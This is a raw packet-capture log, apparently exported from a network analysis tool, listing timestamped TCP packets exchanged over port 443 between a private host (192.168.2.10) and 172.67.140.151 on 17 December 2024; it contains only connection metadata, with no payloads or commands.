                                                                                    Dec 17, 2024 08:38:38.401160955 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.401176929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.401343107 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.408395052 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.408417940 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.408518076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.408518076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.408540964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.410229921 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.415641069 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.415663004 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.415786028 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.415786028 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.415792942 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.416383028 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.423219919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.423254013 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.423331976 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.423343897 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.423386097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.423460960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.429689884 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.429708004 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.429944038 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.429954052 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.431833029 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.436634064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.436650991 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.436836004 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.436845064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.437026024 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.444176912 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.444196939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.444282055 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.444288969 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.444380045 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.451539040 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.451571941 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.451632023 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.451637983 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.451675892 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.451675892 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.594274044 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.594296932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.594374895 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.594374895 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.594388008 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.594540119 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.600744963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.600759983 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.600800037 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.600810051 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.600838900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.608269930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.608289957 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.608339071 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.608364105 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.608488083 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.615958929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.615976095 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.616015911 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.616035938 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.616081953 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.616081953 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.622334003 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.622354031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.622433901 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.622433901 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.622441053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.622490883 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.630531073 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.630553961 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.630589962 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.630595922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.630630016 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.630758047 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.636801958 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.636821985 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.636883020 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.636888981 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.636996031 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.636996031 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.644695997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.644722939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.644764900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.644785881 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.644815922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.644851923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.787224054 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.787251949 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.787393093 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.787404060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.787605047 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.792781115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.792814016 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.792850018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.792871952 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.792901993 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.792985916 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.800230026 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.800252914 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.800295115 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.800313950 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.800362110 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.800362110 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.807687998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.807706118 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.807802916 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.807812929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.807861090 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.809957027 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.810069084 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.817337036 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.817353010 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.817477942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.817477942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.817487001 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.824413061 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.824435949 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.824477911 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.824496031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.824523926 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.832079887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.832108974 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.832142115 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.832160950 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.832195044 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.838397980 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.838428020 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.838561058 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.838561058 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.838568926 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.887717009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.984493017 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.984510899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.984560966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.984582901 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.984602928 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.984620094 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.984999895 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.985271931 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.991585016 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.991595984 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.991619110 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.991741896 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.991741896 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.991753101 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.991806030 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.999109030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.999126911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.999232054 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.999232054 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:38.999238968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:38.999486923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.005629063 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.005645990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.005883932 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.005892038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.006058931 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.012571096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.012588978 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.012677908 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.012687922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.012955904 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.020102024 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.020118952 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.020172119 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.020190001 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.020281076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.020281076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.027508020 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.027524948 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.027582884 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.027599096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.027817011 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.035015106 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.035032034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.035145044 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.035155058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.035329103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.176481962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.176507950 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.176661015 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.176683903 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.177145004 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.181751013 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.181797028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.181910992 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.181910992 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.181922913 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.182007074 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.189579010 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.189596891 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.189718962 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.189743042 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.189851999 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.190164089 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.196676970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.196691036 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.196779966 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.196796894 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.197000980 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.204246044 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.204261065 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.204417944 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.204427004 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.207742929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.211221933 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.211239100 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.211333990 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.211344957 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.211611032 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.217688084 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.217705011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.217816114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.217827082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.218200922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.225231886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.225250959 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.225347996 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.225358963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.225677013 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.367696047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.367727041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.367840052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.367861986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.371700048 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.374214888 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.374238968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.374351025 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.374357939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.374377966 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.374422073 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.381586075 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.381602049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.383330107 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.383342981 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.383749008 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.389183998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.389230013 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.389375925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.389375925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.389385939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.392375946 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.395756960 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.395802021 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.395894051 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.395904064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.395972013 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.403673887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.403724909 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.403851986 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.403851986 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.403862953 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.406898022 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.410171032 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.410198927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.410389900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.410403013 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.415767908 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.417562008 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.417584896 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.417639971 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.417646885 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.417690039 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.417690039 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.559626102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.559657097 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.559740067 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.559740067 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.559751987 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.562710047 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.566135883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.566157103 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.570075989 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.570085049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.571698904 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.573525906 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.573569059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.573612928 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.573628902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.573667049 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.573667049 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.581034899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.581052065 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.581119061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.581136942 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.583914042 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.587568998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.587585926 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.587654114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.587671995 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.590132952 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.595523119 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.595541000 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.595622063 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.595628977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.598737001 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.602085114 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.602102041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.602154970 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.602166891 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.602201939 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.602201939 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.609471083 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.609488964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.609545946 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.609559059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.610680103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.751660109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.751688004 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.751775026 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.751775026 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.751792908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.751950979 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.758259058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.758279085 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.758364916 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.758373976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.758466005 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.758498907 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.765690088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.765710115 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:39.765806913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.765806913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:39.765821934 CET44349713172.67.140.151192.168.2.10
